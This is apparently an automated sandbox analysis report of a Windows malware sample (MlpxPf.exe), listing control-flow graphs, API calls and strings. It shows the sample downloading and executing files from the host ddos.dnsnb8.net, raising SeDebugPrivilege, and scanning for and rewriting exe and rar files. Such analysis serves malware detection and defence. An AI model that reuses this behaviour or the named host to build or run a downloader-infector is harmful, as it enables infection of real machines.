                                    control_flow_graph 150 3528b8-3528ff memset wsprintfA 151 352905-35290d 150->151 152 3529db-3529df 150->152 151->152 153 352913-352919 151->153 154 352956-352965 strrchr 153->154 155 35291b-35294c memset wsprintfA call 3529e2 153->155 154->152 157 352967-352978 lstrcmpiA 154->157 158 352951 155->158 159 352988-352992 lstrcmpiA 157->159 160 35297a-352981 call 351e6e 157->160 158->152 159->152 161 352994-35299b 159->161 165 352986 160->165 163 3529ad-3529c9 strstr 161->163 164 35299d-3529a3 161->164 167 3529d3-3529d6 call 352692 163->167 168 3529cb-3529d1 call 35239d 163->168 164->163 166 3529a5-3529a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                                    APIs
                                    • memset.MSVCRT ref: 003528D3
                                    • wsprintfA.USER32 ref: 003528F7
                                    • memset.MSVCRT ref: 00352925
                                    • wsprintfA.USER32 ref: 00352940
                                      • Part of subcall function 003529E2: memset.MSVCRT ref: 00352A02
                                      • Part of subcall function 003529E2: wsprintfA.USER32 ref: 00352A1A
                                      • Part of subcall function 003529E2: memset.MSVCRT ref: 00352A44
                                      • Part of subcall function 003529E2: lstrlen.KERNEL32(?), ref: 00352A54
                                      • Part of subcall function 003529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00352A6C
                                      • Part of subcall function 003529E2: strrchr.MSVCRT ref: 00352A7C
                                      • Part of subcall function 003529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00352A9F
                                      • Part of subcall function 003529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00352AAE
                                      • Part of subcall function 003529E2: memset.MSVCRT ref: 00352AC6
                                      • Part of subcall function 003529E2: memset.MSVCRT ref: 00352ADA
                                      • Part of subcall function 003529E2: FindFirstFileA.KERNEL32(?,?), ref: 00352AEF
                                      • Part of subcall function 003529E2: memset.MSVCRT ref: 00352B13
                                    • strrchr.MSVCRT ref: 00352959
                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00352974
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                    • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                    • API String ID: 3004273771-1035934456
                                    • Opcode ID: 9d291a73c1271f2f3799b681570895680bde8c84d89e4e188895714d972a579f
                                    • Instruction ID: f30ed098e7251ea50c31a7fd153bbdb8a538bca6dd42500ed98f8d5ca2daabf4
                                    • Opcode Fuzzy Hash: 9d291a73c1271f2f3799b681570895680bde8c84d89e4e188895714d972a579f
                                    • Instruction Fuzzy Hash: EE31E77190030C6BDB239764DC85FDB776C9F12352F060852FD45A71A1E7B49ADC8BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 172 351099-3510b4 173 351199-35119c 172->173 174 3510ba-3510c7 172->174 175 3510c8-3510d4 174->175 176 351184-351190 175->176 177 3510da 175->177 176->175 178 351196-351198 176->178 179 351113-351162 call 35185b wsprintfA * 2 URLDownloadToFileA 177->179 178->173 182 3510dc-35110d call 351000 WinExec lstrlen 179->182 183 351168-351182 lstrlen Sleep 179->183 182->178 182->179 183->176 183->179
                                    APIs
                                      • Part of subcall function 0035185B: GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
                                      • Part of subcall function 0035185B: srand.MSVCRT ref: 00351878
                                      • Part of subcall function 0035185B: rand.MSVCRT ref: 00351880
                                      • Part of subcall function 0035185B: srand.MSVCRT ref: 00351890
                                      • Part of subcall function 0035185B: rand.MSVCRT ref: 00351894
                                    • WinExec.KERNEL32(?,00000005), ref: 003510F1
                                    • lstrlen.KERNEL32(00354748), ref: 003510FA
                                    • wsprintfA.USER32 ref: 0035112A
                                    • wsprintfA.USER32 ref: 00351143
                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0035115B
                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00351169
                                    • Sleep.KERNEL32 ref: 00351179
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                    • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG5$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1280626985-204666294
                                    • Opcode ID: 29c45cb13863b06f9fbc01ea753e6a0e00399ac980b76238034db8152bad714a
                                    • Instruction ID: 0a70dadb2425570ec1c8c6f65572ce6130fea917be5f52990b6988a15945a1e6
                                    • Opcode Fuzzy Hash: 29c45cb13863b06f9fbc01ea753e6a0e00399ac980b76238034db8152bad714a
                                    • Instruction Fuzzy Hash: 94211B75900348BADB279BA0DC49FAFBBBDAB0535BF114095E905A3071D7749B888FA0

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0035164F
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0035165B
                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00000104), ref: 0035166E
                                    • CreateThread.KERNEL32(00000000,00000000,00351099,00000000,00000000,00000000), ref: 003516AC
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003516BD
                                      • Part of subcall function 0035139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 003513BC
                                      • Part of subcall function 0035139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003513DA
                                      • Part of subcall function 0035139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00351448
                                    • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 003516E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$C:\Windows\system32$Documents and Settings
                                    • API String ID: 123563730-474348920
                                    • Opcode ID: ec46645bc622ff7f68ef5ff6fa84c1c7a1d579a5aa554c0d8fb9a4bf7a4578cc
                                    • Instruction ID: 959f47b53f3bec6e122d337f21d5bc7d3392ae1a32d282d61c0f2d09df7da504
                                    • Opcode Fuzzy Hash: ec46645bc622ff7f68ef5ff6fa84c1c7a1d579a5aa554c0d8fb9a4bf7a4578cc
                                    • Instruction Fuzzy Hash: E41196725413147BCB2367A49D49FDB3E6DEB453A7F010011FE0A960F1D6708588CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 205 351000-351023 CreateFileA 206 351025-351055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 351092-351096 205->207 208 351057-35105f 206->208 209 35107b-351085 206->209 210 351074-351075 UnmapViewOfFile 208->210 211 351061-35106e call 3517d0 208->211 212 351087-35108b CloseHandle 209->212 213 35108d-351091 CloseHandle 209->213 210->209 211->210 212->213 213->207
                                    APIs
                                    • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG5,http://%s:%d/%s/%s,003510E8,?), ref: 00351018
                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76C08400), ref: 00351029
                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00351038
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0035104B
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00351075
                                    • CloseHandle.KERNEL32(?), ref: 0035108B
                                    • CloseHandle.KERNEL32(00000000), ref: 0035108E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                    • String ID: HG5$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1223616889-870461908
                                    • Opcode ID: c9f9e06a75348554a4ccfa4ae6373b6d319390df348c240e4e645d1617ebd98a
                                    • Instruction ID: 202146857b5a79df69fcab2ec034070be18807e4332990b4ce5c65a8c728ca11
                                    • Opcode Fuzzy Hash: c9f9e06a75348554a4ccfa4ae6373b6d319390df348c240e4e645d1617ebd98a
                                    • Instruction Fuzzy Hash: B4011EB150035DBFE6226F609C88F2BBBACEB447EAF014529B645A31E0D6705E448A61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 374 352c48-352c75 memset call 351973 377 352c77-352c7f 374->377 378 352cb2-352cb9 374->378 379 352c81-352c8b 377->379 380 352c8f-352cac CreateThread WaitForMultipleObjects 377->380 381 352cc8-352ccc 378->381 382 352cbb-352cc2 VirtualFree 378->382 379->380 380->378 382->381
                                    APIs
                                    • memset.MSVCRT ref: 00352C57
                                      • Part of subcall function 00351973: PathFileExistsA.SHLWAPI(\N5`N5,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351992
                                      • Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003519BA
                                      • Part of subcall function 00351973: Sleep.KERNEL32(00000064), ref: 003519C6
                                      • Part of subcall function 00351973: wsprintfA.USER32 ref: 003519EC
                                      • Part of subcall function 00351973: CopyFileA.KERNEL32(?,?,00000000), ref: 00351A00
                                      • Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00351A1E
                                      • Part of subcall function 00351973: GetFileSize.KERNEL32(?,00000000), ref: 00351A2C
                                      • Part of subcall function 00351973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00351A46
                                      • Part of subcall function 00351973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00351A65
                                    • CreateThread.KERNEL32(00000000,00000000,00352B8C,00000000,00000000,00000000), ref: 00352C99
                                    • WaitForMultipleObjects.KERNEL32(00000001,003516BA,00000001,000000FF,?,003516BA,00000000), ref: 00352CAC
                                    • VirtualFree.KERNEL32(01110000,00000000,00008000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00354E5C,00354E60,?,003516BA,00000000), ref: 00352CC2
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00352C69
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                    • API String ID: 2042498389-2612645121
                                    • Opcode ID: 871303ecc8c02753416ccb5c4b2d72d461d645bf6658099336676aec496d72d3
                                    • Instruction ID: 7df2576a0a934555ac2f0e560e4e5a3658c1de4fdb7a2e46a512277087f732a3
                                    • Opcode Fuzzy Hash: 871303ecc8c02753416ccb5c4b2d72d461d645bf6658099336676aec496d72d3
                                    • Instruction Fuzzy Hash: 95018F716413207BD716ABA5EC0AEEF7E6CEF02B66F504110FD05E61E2D6A09A48C7E0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 383 3514e1-3514fb 384 351541-351547 383->384 385 3514fd-351510 GetModuleHandleA 383->385 386 351573-351574 call 351638 384->386 387 351549-35154c 384->387 388 351512-351518 385->388 389 35151a-351535 VirtualQuery 385->389 396 351579-35157a ExitProcess 386->396 392 35154e-351555 387->392 393 351569-351570 387->393 388->384 390 351537-351539 389->390 391 35153b 389->391 390->384 390->391 391->384 392->393 395 351557-351566 call 351af9 392->395 395->393
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00351504
                                    • VirtualQuery.KERNEL32(003514E1,?,0000001C), ref: 00351525
                                    • ExitProcess.KERNEL32 ref: 0035157A
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 3946701194-0
                                    • Opcode ID: 086672c597043e23879eeea8fb1cb2f3864f7528171ebb5b6ac397df37e5876b
                                    • Instruction ID: ea72a25cbceb4ad474a5895de2e32e62397d88d8627a20c058d5b6caeaba4951
                                    • Opcode Fuzzy Hash: 086672c597043e23879eeea8fb1cb2f3864f7528171ebb5b6ac397df37e5876b
                                    • Instruction Fuzzy Hash: FA114871900304DFCB23DFA6A884B7AB7BCEB8575BF11442AE80296171E2708985AB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 399 351915-351922 400 351924-351926 399->400 401 351928-35192c 399->401 402 35196e-351970 400->402 403 35194f-351952 401->403 404 35192e-35194d memset GetFileTime 401->404 403->402 406 351954-351960 SetFileTime 403->406 405 351966-351968 404->405 407 35196c 405->407 408 35196a 405->408 406->405 407->402 408->407
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: FileTimememset
                                    • String ID:
                                    • API String ID: 176422537-0
                                    • Opcode ID: 5a08b2617454f45ebf56ff516d6a64af022349adc7a4955ee3966977df7d461c
                                    • Instruction ID: 4e8437b6f0a47b61dd5a5fe3afd3f8913926659e015e5e68abb8cad664890c92
                                    • Opcode Fuzzy Hash: 5a08b2617454f45ebf56ff516d6a64af022349adc7a4955ee3966977df7d461c
                                    • Instruction Fuzzy Hash: 90F04432200309ABD7229E66DC04FA777ACAB50362F01853AFD16D64B0E770D64DDBE0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 409 356159-35615d 410 35615f-356189 VirtualFree 409->410 411 35618c-356192 410->411 412 3560c7-3560cf 411->412 413 356198-3561b0 VirtualFree 411->413 412->411 414 3560d5-3560f8 VirtualAlloc 412->414 415 3561b2-3561b4 413->415 416 3561ba-3561c8 413->416 436 3560fe-356106 414->436 437 3560fa-3560fc call 3566c8 414->437 415->416 417 356243-356251 416->417 418 3561ca-3561d7 416->418 422 356264-35626f 417->422 423 356253 417->423 420 3561dd-3561e0 418->420 420->417 425 3561e2-3561f2 420->425 424 356271-356276 422->424 427 356255-356258 423->427 428 35627c-356289 424->428 429 356389-3563b1 VirtualProtect 424->429 430 3561f5-3561fe 425->430 427->422 432 35625a-356262 427->432 449 356292-356298 428->449 450 35628b 428->450 435 3563b7-3563ba 429->435 433 356200-356203 430->433 434 35620c-356219 430->434 432->427 439 356205-356208 433->439 440 35621b-356228 433->440 441 356238-35623f 434->441 442 3563fc-356416 VirtualProtect 435->442 443 3563bc-3563c2 435->443 445 356155 436->445 446 356108-35611d 436->446 437->436 451 35622a-356236 439->451 452 35620a 439->452 440->441 441->430 454 356241 441->454 457 356420-356425 442->457 458 356418-35641d 442->458 443->443 453 3563c4 443->453 445->410 447 35611f-356121 446->447 455 356151-356154 447->455 456 356123 447->456 459 3562a2-3562ac 449->459 450->449 451->441 452->441 453->442 460 3563c6-3563cf 453->460 454->420 455->445 456->455 461 356125-356128 456->461 462 3562b1-3562c8 459->462 463 3562ae 459->463 464 3563d4-3563d8 460->464 465 3563d1 460->465 466 356134-35613b 461->466 467 35612a-35612e 461->467 468 356373-356384 462->468 469 3562ce-3562d4 462->469 463->462 470 3563dd-3563e1 464->470 471 3563da 464->471 465->464 478 356130-356132 466->478 479 35613d-35614f 466->479 467->466 467->478 468->424 476 3562d6-3562d9 469->476 477 3562da-3562f1 469->477 472 3563e7-3563fa VirtualProtect 470->472 473 3563e3 470->473 471->470 472->435 472->442 473->472 476->477 481 356365-35636e 477->481 482 3562f3-3562f9 477->482 478->447 479->447 481->459 483 356314-356326 482->483 484 3562fb-35630f 482->484 486 35634c-356360 483->486 487 356328-35634a 483->487 485 356426-3564a9 484->485 496 356519-35651c 485->496 497 3564ab-3564c0 485->497 486->485 487->481 498 356583-356587 496->498 499 35651d-35651e 496->499 503 356535-356537 497->503 504 3564c2 497->504 501 356588-35658b 498->501 502 356522-356533 499->502 505 3565a1-3565a3 501->505 506 35658d-35658f 501->506 502->503 507 356539 503->507 508 35659a 503->508 509 3564c5-3564cd 504->509 510 3564f8 504->510 511 356591-356593 506->511 512 3565b4 507->512 513 35653b-356541 507->513 514 35659b-35659d 508->514 515 356542-356545 509->515 516 3564cf-3564d4 509->516 517 35656c-35656f 510->517 518 3564fa-3564fe 510->518 511->514 519 356595 511->519 524 3565be-356608 512->524 513->515 514->511 520 35659f 514->520 521 35654d-356550 515->521 522 356517-356518 516->522 523 3564d6-3564d9 516->523 525 356572 517->525 518->525 526 356500 518->526 519->508 520->501 521->524 527 356552-356556 521->527 522->496 523->521 528 3564db-3564f5 523->528 529 356573-356576 525->529 526->502 530 356502 526->530 531 356578-35657f 527->531 533 356558-356569 527->533 528->510 529->531 530->529 532 356504-356513 530->532 531->498 532->503 535 356515 532->535 533->517 535->522
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003560DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00356189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003561A5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID:
                                    • API String ID: 1852963964-0
                                    • Opcode ID: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
                                    • Instruction ID: e8811f3fad31532d296a36f9d5f64f012d9d77c06fc73b2a4120166c9b19b44b
                                    • Opcode Fuzzy Hash: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
                                    • Instruction Fuzzy Hash: 93215131600649CFCB728F58CC82BED77A1FF45302FAA0419DD899B6A1DA716954CB94
                                    APIs
                                    • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,003513EF), ref: 003511AB
                                    • OpenProcessToken.ADVAPI32(00000000,00000028,003513EF,?,?,?,?,?,?,003513EF), ref: 003511BB
                                    • AdjustTokenPrivileges.ADVAPI32(003513EF,00000000,?,00000010,00000000,00000000), ref: 003511EB
                                    • CloseHandle.KERNEL32(003513EF), ref: 003511FA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,003513EF), ref: 00351203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 003511A5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                    • API String ID: 75692138-2612645121
                                    • Opcode ID: 3a1b252bd8cce11175167f69f2f72fb7df641e5a260fafb3f7cdf27bf809dd22
                                    • Instruction ID: abbe8300ef25ea9b51fbb09357c98127cb124e7027029005a0c5eefa500c84b6
                                    • Opcode Fuzzy Hash: 3a1b252bd8cce11175167f69f2f72fb7df641e5a260fafb3f7cdf27bf809dd22
                                    • Instruction Fuzzy Hash: 6F01E8B5900309EFDB02DFD4CD89AAEBBBCFB04346F504469E606A21A1D7715F449B50
                                    APIs
                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 003513BC
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003513DA
                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00351448
                                      • Part of subcall function 0035119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,003513EF), ref: 003511AB
                                      • Part of subcall function 0035119F: OpenProcessToken.ADVAPI32(00000000,00000028,003513EF,?,?,?,?,?,?,003513EF), ref: 003511BB
                                      • Part of subcall function 0035119F: AdjustTokenPrivileges.ADVAPI32(003513EF,00000000,?,00000010,00000000,00000000), ref: 003511EB
                                      • Part of subcall function 0035119F: CloseHandle.KERNEL32(003513EF), ref: 003511FA
                                      • Part of subcall function 0035119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,003513EF), ref: 00351203
                                    Strings
                                    • SeDebugPrivilege, xrefs: 003513D3
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 003513A8
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SeDebugPrivilege
                                    • API String ID: 4123949106-1990086918
                                    • Opcode ID: 0ed9d0d31b99a446a4b7a718a04c4bd5dfc1d634554350b24872d1999b962a18
                                    • Instruction ID: 4126f564e0a6fb7504b7dbce77b4f9c8c30ef3b129755398f09442bc4c456cd4
                                    • Opcode Fuzzy Hash: 0ed9d0d31b99a446a4b7a718a04c4bd5dfc1d634554350b24872d1999b962a18
                                    • Instruction Fuzzy Hash: FC3195B1D40209EADF62DBA6CC45FEEBBB8EB44706F124069E905B7161D7309E49CB60
                                    APIs
                                    • strstr.MSVCRT ref: 003523CC
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00352464
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00352472
                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 003524A8
                                    • memset.MSVCRT ref: 003524B9
                                    • strrchr.MSVCRT ref: 003524C9
                                    • wsprintfA.USER32 ref: 003524DE
                                    • strrchr.MSVCRT ref: 003524ED
                                    • memset.MSVCRT ref: 003524F2
                                    • memset.MSVCRT ref: 00352505
                                    • wsprintfA.USER32 ref: 00352524
                                    • Sleep.KERNEL32(000007D0), ref: 00352535
                                    • Sleep.KERNEL32(000007D0), ref: 0035255D
                                    • memset.MSVCRT ref: 0035256E
                                    • wsprintfA.USER32 ref: 00352585
                                    • memset.MSVCRT ref: 003525A6
                                    • wsprintfA.USER32 ref: 003525CA
                                    • Sleep.KERNEL32(000007D0), ref: 003525D0
                                    • Sleep.KERNEL32(000007D0,?,?), ref: 003525E5
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003525FC
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00352611
                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00352642
                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0035265B
                                    • SetEndOfFile.KERNEL32 ref: 0035266D
                                    • CloseHandle.KERNEL32(00000000), ref: 00352676
                                    • RemoveDirectoryA.KERNEL32(?), ref: 00352681
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
